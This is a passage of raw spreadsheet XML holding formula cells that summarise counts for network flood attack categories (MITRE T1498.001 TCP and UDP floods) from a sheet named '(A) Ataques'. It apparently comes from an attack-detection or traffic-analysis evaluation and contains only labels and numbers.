        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!DB65,"")</f>
        <v>2</v>
      </c>
      <c r="AW65" s="20">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!DC65,"")</f>
        <v>312</v>
      </c>
      <c r="AX65" s="331">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",IF($AT65=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY65" s="469">
        <f>'(A) Ataques'!LU65+'(A) Ataques'!MA65+'(A) Ataques'!MG65+'(A) Ataques'!MM65+'(A) Ataques'!MS65</f>
        <v>289007</v>
      </c>
      <c r="AZ65" s="510">
        <f>'(A) Ataques'!LW65+'(A) Ataques'!MC65+'(A) Ataques'!MI65+'(A) Ataques'!MO65+'(A) Ataques'!MU65</f>
        <v>289007</v>
      </c>
      <c r="BA65" s="471">
        <f>'(A) Ataques'!LY65+'(A) Ataques'!ME65+'(A) Ataques'!MK65+'(A) Ataques'!MQ65+'(A) Ataques'!MW65</f>
        <v>1</v>
      </c>
      <c r="BB65" s="471">
        <f>'(A) Ataques'!LQ65</f>
        <v>289007</v>
      </c>
      <c r="BC65" s="331">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",IF($AY65=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD65" s="469">
        <f>IF('(A) Ataques'!$AP65&lt;&gt;"NO",'(A) Ataques'!LL65,"")</f>
        <v>578015</v>
      </c>
      <c r="BE65" s="510">
        <f>IF('(A) Ataques'!$AP65&lt;&gt;"NO",'(A) Ataques'!LM65,"")</f>
        <v>578015</v>
      </c>
      <c r="BF65" s="471">
        <f>IF('(A) Ataques'!$AP65&lt;&gt;"NO",'(A) Ataques'!LN65,"")</f>
        <v>1</v>
      </c>
      <c r="BG65" s="471">
        <f>IF('(A) Ataques'!$AP65&lt;&gt;"NO",'(A) Ataques'!LO65,"")</f>
        <v>1</v>
      </c>
      <c r="BH65" s="471">
        <f>IF('(A) Ataques'!$AP65&lt;&gt;"NO",'(A) Ataques'!LS65,"")</f>
        <v>289008</v>
      </c>
      <c r="BI65" s="331">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",IF($BD65=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ65" s="469">
        <f>'(A) Ataques'!OL65+'(A) Ataques'!OR65+'(A) Ataques'!OX65+'(A) Ataques'!PD65+'(A) Ataques'!PJ65</f>
        <v>289193</v>
      </c>
      <c r="BK65" s="510">
        <f>'(A) Ataques'!ON65+'(A) Ataques'!OT65+'(A) Ataques'!OZ65+'(A) Ataques'!PF65+'(A) Ataques'!PL65</f>
        <v>289193</v>
      </c>
      <c r="BL65" s="471">
        <f>'(A) Ataques'!OP65+'(A) Ataques'!OV65+'(A) Ataques'!PB65+'(A) Ataques'!PH65+'(A) Ataques'!PN65</f>
        <v>1</v>
      </c>
      <c r="BM65" s="495">
        <f>'(A) Ataques'!OH65</f>
        <v>289193</v>
      </c>
      <c r="BN65" s="331">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",IF($BJ65=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO65" s="469">
        <f>IF('(A) Ataques'!$AP65&lt;&gt;"NO",'(A) Ataques'!OC65,"")</f>
        <v>289193</v>
      </c>
      <c r="BP65" s="510">
        <f>IF('(A) Ataques'!$AP65&lt;&gt;"NO",'(A) Ataques'!OD65,"")</f>
        <v>289193</v>
      </c>
      <c r="BQ65" s="471">
        <f>IF('(A) Ataques'!$AP65&lt;&gt;"NO",'(A) Ataques'!OE65,"")</f>
        <v>1</v>
      </c>
      <c r="BR65" s="471">
        <f>IF('(A) Ataques'!$AP65&lt;&gt;"NO",'(A) Ataques'!OF65,"")</f>
        <v>1</v>
      </c>
      <c r="BS65" s="471">
        <f>IF('(A) Ataques'!$AP65&lt;&gt;"NO",'(A) Ataques'!OJ65,"")</f>
        <v>289193</v>
      </c>
      <c r="BT65" s="331">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",IF($BO65=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="66" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A66" s="79">
        <f t="shared" si="0"/>
        <v>64</v>
      </c>
      <c r="B66" s="4">
        <f>IF('(A) Ataques'!AK66&lt;&gt;"NO",'(A) Ataques'!E66,"")</f>
        <v>47</v>
      </c>
      <c r="C66" s="6" t="str">
        <f>IF('(A) Ataques'!AK66&lt;&gt;"NO",IF('(A) Ataques'!M66="","",'(A) Ataques'!M66),"")</f>
        <v>T1498.001-TCP_flood</v>
      </c>
      <c r="D66" s="4" t="str">
        <f>IF('(A) Ataques'!AK66&lt;&gt;"NO",'(A) Ataques'!F66,"")</f>
        <v>T1498</v>
      </c>
      <c r="E66" s="286">
        <f>IF('(A) Ataques'!AK66&lt;&gt;"NO",'(A) Ataques'!AQ66,"")</f>
        <v>1074379</v>
      </c>
      <c r="F66" s="288">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!BB66,"")</f>
        <v>2</v>
      </c>
      <c r="G66" s="392">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!BD66,"")</f>
        <v>1</v>
      </c>
      <c r="H66" s="4">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!BF66,"")</f>
        <v>1</v>
      </c>
      <c r="I66" s="20">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!BG66,"")</f>
        <v>1</v>
      </c>
      <c r="J66" s="530">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",IF($F66=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K66" s="322">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$BH66,"")</f>
        <v>540</v>
      </c>
      <c r="L66" s="322">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$BJ66,"")</f>
        <v>540</v>
      </c>
      <c r="M66" s="4">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$BL66,"")</f>
        <v>1</v>
      </c>
      <c r="N66" s="20">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$BM66,"")</f>
        <v>540</v>
      </c>
      <c r="O66" s="532">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",IF($K66=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P66" s="292">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$BN66,"")</f>
        <v>542</v>
      </c>
      <c r="Q66" s="322">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$BP66,"")</f>
        <v>541</v>
      </c>
      <c r="R66" s="4">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$BR66,"")</f>
        <v>2</v>
      </c>
      <c r="S66" s="20">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$BS66,"")</f>
        <v>541</v>
      </c>
      <c r="T66" s="530">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",IF($P66=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U66" s="322">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$BT66,"")</f>
        <v>374244</v>
      </c>
      <c r="V66" s="322">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$BV66,"")</f>
        <v>309773</v>
      </c>
      <c r="W66" s="4">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$BX66,"")</f>
        <v>2</v>
      </c>
      <c r="X66" s="20">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$BY66,"")</f>
        <v>163462</v>
      </c>
      <c r="Y66" s="532">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",IF($U66=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z66" s="288">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!BZ66,"")</f>
        <v>135269</v>
      </c>
      <c r="AA66" s="392">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!CB66,"")</f>
        <v>115899</v>
      </c>
      <c r="AB66" s="4">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!CD66,"")</f>
        <v>5</v>
      </c>
      <c r="AC66" s="20">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!CE66,"")</f>
        <v>57816</v>
      </c>
      <c r="AD66" s="331">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",IF(Z66=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE66" s="322">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$CF66,"")</f>
        <v>509513</v>
      </c>
      <c r="AF66" s="322">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$CH66,"")</f>
        <v>425672</v>
      </c>
      <c r="AG66" s="4">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$CJ66,"")</f>
        <v>7</v>
      </c>
      <c r="AH66" s="20">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$CK66,"")</f>
        <v>163548</v>
      </c>
      <c r="AI66" s="287">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",IF($AE66=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ66" s="292">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$CL66,"")</f>
        <v>0</v>
      </c>
      <c r="AK66" s="322">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$CN66,"")</f>
        <v>0</v>
      </c>
      <c r="AL66" s="4">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$CP66,"")</f>
        <v>0</v>
      </c>
      <c r="AM66" s="20">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$CQ66,"")</f>
        <v>0</v>
      </c>
      <c r="AN66" s="331">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",IF($AJ66=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO66" s="322">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$CR66,"")</f>
        <v>0</v>
      </c>
      <c r="AP66" s="322">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$CT66,"")</f>
        <v>0</v>
      </c>
      <c r="AQ66" s="4">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$CV66,"")</f>
        <v>0</v>
      </c>
      <c r="AR66" s="20">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!$CW66,"")</f>
        <v>0</v>
      </c>
      <c r="AS66" s="287">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",IF($AO66=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT66" s="288">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!CX66,"")</f>
        <v>542</v>
      </c>
      <c r="AU66" s="392">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!CZ66,"")</f>
        <v>541</v>
      </c>
      <c r="AV66" s="4">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!DB66,"")</f>
        <v>2</v>
      </c>
      <c r="AW66" s="20">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",'(A) Ataques'!DC66,"")</f>
        <v>541</v>
      </c>
      <c r="AX66" s="331">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",IF($AT66=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY66" s="469">
        <f>'(A) Ataques'!LU66+'(A) Ataques'!MA66+'(A) Ataques'!MG66+'(A) Ataques'!MM66+'(A) Ataques'!MS66</f>
        <v>317130</v>
      </c>
      <c r="AZ66" s="510">
        <f>'(A) Ataques'!LW66+'(A) Ataques'!MC66+'(A) Ataques'!MI66+'(A) Ataques'!MO66+'(A) Ataques'!MU66</f>
        <v>317130</v>
      </c>
      <c r="BA66" s="471">
        <f>'(A) Ataques'!LY66+'(A) Ataques'!ME66+'(A) Ataques'!MK66+'(A) Ataques'!MQ66+'(A) Ataques'!MW66</f>
        <v>1</v>
      </c>
      <c r="BB66" s="471">
        <f>'(A) Ataques'!LQ66</f>
        <v>317130</v>
      </c>
      <c r="BC66" s="331">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",IF($AY66=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD66" s="469">
        <f>IF('(A) Ataques'!$AP66&lt;&gt;"NO",'(A) Ataques'!LL66,"")</f>
        <v>634798</v>
      </c>
      <c r="BE66" s="510">
        <f>IF('(A) Ataques'!$AP66&lt;&gt;"NO",'(A) Ataques'!LM66,"")</f>
        <v>634798</v>
      </c>
      <c r="BF66" s="471">
        <f>IF('(A) Ataques'!$AP66&lt;&gt;"NO",'(A) Ataques'!LN66,"")</f>
        <v>1</v>
      </c>
      <c r="BG66" s="471">
        <f>IF('(A) Ataques'!$AP66&lt;&gt;"NO",'(A) Ataques'!LO66,"")</f>
        <v>6</v>
      </c>
      <c r="BH66" s="471">
        <f>IF('(A) Ataques'!$AP66&lt;&gt;"NO",'(A) Ataques'!LS66,"")</f>
        <v>317671</v>
      </c>
      <c r="BI66" s="331">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",IF($BD66=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ66" s="469">
        <f>'(A) Ataques'!OL66+'(A) Ataques'!OR66+'(A) Ataques'!OX66+'(A) Ataques'!PD66+'(A) Ataques'!PJ66</f>
        <v>1142853</v>
      </c>
      <c r="BK66" s="510">
        <f>'(A) Ataques'!ON66+'(A) Ataques'!OT66+'(A) Ataques'!OZ66+'(A) Ataques'!PF66+'(A) Ataques'!PL66</f>
        <v>1142853</v>
      </c>
      <c r="BL66" s="471">
        <f>'(A) Ataques'!OP66+'(A) Ataques'!OV66+'(A) Ataques'!PB66+'(A) Ataques'!PH66+'(A) Ataques'!PN66</f>
        <v>4</v>
      </c>
      <c r="BM66" s="495">
        <f>'(A) Ataques'!OH66</f>
        <v>1074116</v>
      </c>
      <c r="BN66" s="331">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",IF($BJ66=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO66" s="469">
        <f>IF('(A) Ataques'!$AP66&lt;&gt;"NO",'(A) Ataques'!OC66,"")</f>
        <v>1142853</v>
      </c>
      <c r="BP66" s="510">
        <f>IF('(A) Ataques'!$AP66&lt;&gt;"NO",'(A) Ataques'!OD66,"")</f>
        <v>1142853</v>
      </c>
      <c r="BQ66" s="471">
        <f>IF('(A) Ataques'!$AP66&lt;&gt;"NO",'(A) Ataques'!OE66,"")</f>
        <v>4</v>
      </c>
      <c r="BR66" s="471">
        <f>IF('(A) Ataques'!$AP66&lt;&gt;"NO",'(A) Ataques'!OF66,"")</f>
        <v>2</v>
      </c>
      <c r="BS66" s="471">
        <f>IF('(A) Ataques'!$AP66&lt;&gt;"NO",'(A) Ataques'!OJ66,"")</f>
        <v>1074116</v>
      </c>
      <c r="BT66" s="331">
        <f>IF('(A) Ataques'!$AK66&lt;&gt;"NO",IF($BO66=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="67" spans="1:72" s="5" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A67" s="79">
        <f t="shared" si="0"/>
        <v>65</v>
      </c>
      <c r="B67" s="4">
        <f>IF('(A) Ataques'!AK67&lt;&gt;"NO",'(A) Ataques'!E67,"")</f>
        <v>47</v>
      </c>
      <c r="C67" s="6" t="str">
        <f>IF('(A) Ataques'!AK67&lt;&gt;"NO",IF('(A) Ataques'!M67="","",'(A) Ataques'!M67),"")</f>
        <v>T1498.001-UDP_flood</v>
      </c>
      <c r="D67" s="4" t="str">
        <f>IF('(A) Ataques'!AK67&lt;&gt;"NO",'(A) Ataques'!F67,"")</f>
        <v>T1498</v>
      </c>
      <c r="E67" s="286">
        <f>IF('(A) Ataques'!AK67&lt;&gt;"NO",'(A) Ataques'!AQ67,"")</f>
        <v>60173</v>
      </c>
      <c r="F67" s="288">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!BB67,"")</f>
        <v>0</v>
      </c>
      <c r="G67" s="392">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!BD67,"")</f>
        <v>0</v>
      </c>
      <c r="H67" s="4">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!BF67,"")</f>
        <v>0</v>
      </c>
      <c r="I67" s="20">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!BG67,"")</f>
        <v>0</v>
      </c>
      <c r="J67" s="530">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",IF($F67=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K67" s="322">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$BH67,"")</f>
        <v>0</v>
      </c>
      <c r="L67" s="322">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$BJ67,"")</f>
        <v>0</v>
      </c>
      <c r="M67" s="4">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$BL67,"")</f>
        <v>0</v>
      </c>
      <c r="N67" s="20">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$BM67,"")</f>
        <v>0</v>
      </c>
      <c r="O67" s="532">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",IF($K67=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P67" s="292">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$BN67,"")</f>
        <v>0</v>
      </c>
      <c r="Q67" s="322">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$BP67,"")</f>
        <v>0</v>
      </c>
      <c r="R67" s="4">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$BR67,"")</f>
        <v>0</v>
      </c>
      <c r="S67" s="20">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$BS67,"")</f>
        <v>0</v>
      </c>
      <c r="T67" s="530">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",IF($P67=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="U67" s="322">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$BT67,"")</f>
        <v>15</v>
      </c>
      <c r="V67" s="322">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$BV67,"")</f>
        <v>1</v>
      </c>
      <c r="W67" s="4">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$BX67,"")</f>
        <v>1</v>
      </c>
      <c r="X67" s="20">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$BY67,"")</f>
        <v>1</v>
      </c>
      <c r="Y67" s="532">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",IF($U67=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z67" s="288">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!BZ67,"")</f>
        <v>60191</v>
      </c>
      <c r="AA67" s="392">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!CB67,"")</f>
        <v>60177</v>
      </c>
      <c r="AB67" s="4">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!CD67,"")</f>
        <v>4</v>
      </c>
      <c r="AC67" s="20">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!CE67,"")</f>
        <v>60173</v>
      </c>
      <c r="AD67" s="331">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",IF(Z67=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE67" s="322">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$CF67,"")</f>
        <v>60206</v>
      </c>
      <c r="AF67" s="322">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$CH67,"")</f>
        <v>60178</v>
      </c>
      <c r="AG67" s="4">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$CJ67,"")</f>
        <v>5</v>
      </c>
      <c r="AH67" s="20">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$CK67,"")</f>
        <v>60173</v>
      </c>
      <c r="AI67" s="287">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",IF($AE67=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ67" s="292">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$CL67,"")</f>
        <v>0</v>
      </c>
      <c r="AK67" s="322">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$CN67,"")</f>
        <v>0</v>
      </c>
      <c r="AL67" s="4">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$CP67,"")</f>
        <v>0</v>
      </c>
      <c r="AM67" s="20">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$CQ67,"")</f>
        <v>0</v>
      </c>
      <c r="AN67" s="331">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",IF($AJ67=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO67" s="322">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$CR67,"")</f>
        <v>15</v>
      </c>
      <c r="AP67" s="322">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$CT67,"")</f>
        <v>1</v>
      </c>
      <c r="AQ67" s="4">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$CV67,"")</f>
        <v>1</v>
      </c>
      <c r="AR67" s="20">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!$CW67,"")</f>
        <v>1</v>
      </c>
      <c r="AS67" s="287">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",IF($AO67=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT67" s="288">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!CX67,"")</f>
        <v>15</v>
      </c>
      <c r="AU67" s="392">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!CZ67,"")</f>
        <v>1</v>
      </c>
      <c r="AV67" s="4">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!DB67,"")</f>
        <v>1</v>
      </c>
      <c r="AW67" s="20">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",'(A) Ataques'!DC67,"")</f>
        <v>1</v>
      </c>
      <c r="AX67" s="331">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",IF($AT67=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY67" s="469">
        <f>'(A) Ataques'!LU67+'(A) Ataques'!MA67+'(A) Ataques'!MG67+'(A) Ataques'!MM67+'(A) Ataques'!MS67</f>
        <v>42930</v>
      </c>
      <c r="AZ67" s="510">
        <f>'(A) Ataques'!LW67+'(A) Ataques'!MC67+'(A) Ataques'!MI67+'(A) Ataques'!MO67+'(A) Ataques'!MU67</f>
        <v>42930</v>
      </c>
      <c r="BA67" s="471">
        <f>'(A) Ataques'!LY67+'(A) Ataques'!ME67+'(A) Ataques'!MK67+'(A) Ataques'!MQ67+'(A) Ataques'!MW67</f>
        <v>1</v>
      </c>
      <c r="BB67" s="471">
        <f>'(A) Ataques'!LQ67</f>
        <v>42930</v>
      </c>
      <c r="BC67" s="331">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",IF($AY67=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD67" s="469">
        <f>IF('(A) Ataques'!$AP67&lt;&gt;"NO",'(A) Ataques'!LL67,"")</f>
        <v>42941</v>
      </c>
      <c r="BE67" s="510">
        <f>IF('(A) Ataques'!$AP67&lt;&gt;"NO",'(A) Ataques'!LM67,"")</f>
        <v>42931</v>
      </c>
      <c r="BF67" s="471">
        <f>IF('(A) Ataques'!$AP67&lt;&gt;"NO",'(A) Ataques'!LN67,"")</f>
        <v>1</v>
      </c>
      <c r="BG67" s="471">
        <f>IF('(A) Ataques'!$AP67&lt;&gt;"NO",'(A) Ataques'!LO67,"")</f>
        <v>1</v>
      </c>
      <c r="BH67" s="471">
        <f>IF('(A) Ataques'!$AP67&lt;&gt;"NO",'(A) Ataques'!LS67,"")</f>
        <v>42931</v>
      </c>
      <c r="BI67" s="331">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",IF($BD67=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ67" s="469">
        <f>'(A) Ataques'!OL67+'(A) Ataques'!OR67+'(A) Ataques'!OX67+'(A) Ataques'!PD67+'(A) Ataques'!PJ67</f>
        <v>0</v>
      </c>
      <c r="BK67" s="510">
        <f>'(A) Ataques'!ON67+'(A) Ataques'!OT67+'(A) Ataques'!OZ67+'(A) Ataques'!PF67+'(A) Ataques'!PL67</f>
        <v>0</v>
      </c>
      <c r="BL67" s="471">
        <f>'(A) Ataques'!OP67+'(A) Ataques'!OV67+'(A) Ataques'!PB67+'(A) Ataques'!PH67+'(A) Ataques'!PN67</f>
        <v>0</v>
      </c>
      <c r="BM67" s="495">
        <f>'(A) Ataques'!OH67</f>
        <v>0</v>
      </c>
      <c r="BN67" s="331">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",IF($BJ67=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO67" s="469">
        <f>IF('(A) Ataques'!$AP67&lt;&gt;"NO",'(A) Ataques'!OC67,"")</f>
        <v>0</v>
      </c>
      <c r="BP67" s="510">
        <f>IF('(A) Ataques'!$AP67&lt;&gt;"NO",'(A) Ataques'!OD67,"")</f>
        <v>0</v>
      </c>
      <c r="BQ67" s="471">
        <f>IF('(A) Ataques'!$AP67&lt;&gt;"NO",'(A) Ataques'!OE67,"")</f>
        <v>0</v>
      </c>
      <c r="BR67" s="471">
        <f>IF('(A) Ataques'!$AP67&lt;&gt;"NO",'(A) Ataques'!OF67,"")</f>
        <v>0</v>
      </c>
      <c r="BS67" s="471">
        <f>IF('(A) Ataques'!$AP67&lt;&gt;"NO",'(A) Ataques'!OJ67,"")</f>
        <v>0</v>
      </c>
      <c r="BT67" s="331">
        <f>IF('(A) Ataques'!$AK67&lt;&gt;"NO",IF($BO67=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="68" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A68" s="79">
        <f t="shared" si="0"/>
        <v>66</v>
      </c>
      <c r="B68" s="4">
        <f>IF('(A) Ataques'!AK68&lt;&gt;"NO",'(A) Ataques'!E68,"")</f>
        <v>47</v>
      </c>
      <c r="C68" s="6" t="str">
        <f>IF('(A) Ataques'!AK68&lt;&gt;"NO",IF('(A) Ataques'!M68="","",'(A) Ataques'!M68),"")</f>
        <v>T1498.001-UDP_flood_1</v>
      </c>
      <c r="D68" s="4" t="str">
        <f>IF('(A) Ataques'!AK68&lt;&gt;"NO",'(A) Ataques'!F68,"")</f>
        <v>T1498</v>
      </c>
      <c r="E68" s="286">
        <f>IF('(A) Ataques'!AK68&lt;&gt;"NO",'(A) Ataques'!AQ68,"")</f>
        <v>110</v>
      </c>
      <c r="F68" s="288">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!BB68,"")</f>
        <v>0</v>
      </c>
      <c r="G68" s="392">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!BD68,"")</f>
        <v>0</v>
      </c>
      <c r="H68" s="4">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!BF68,"")</f>
        <v>0</v>
      </c>
      <c r="I68" s="20">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!BG68,"")</f>
        <v>0</v>
      </c>
      <c r="J68" s="530">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",IF($F68=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K68" s="322">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$BH68,"")</f>
        <v>0</v>
      </c>
      <c r="L68" s="322">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$BJ68,"")</f>
        <v>0</v>
      </c>
      <c r="M68" s="4">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$BL68,"")</f>
        <v>0</v>
      </c>
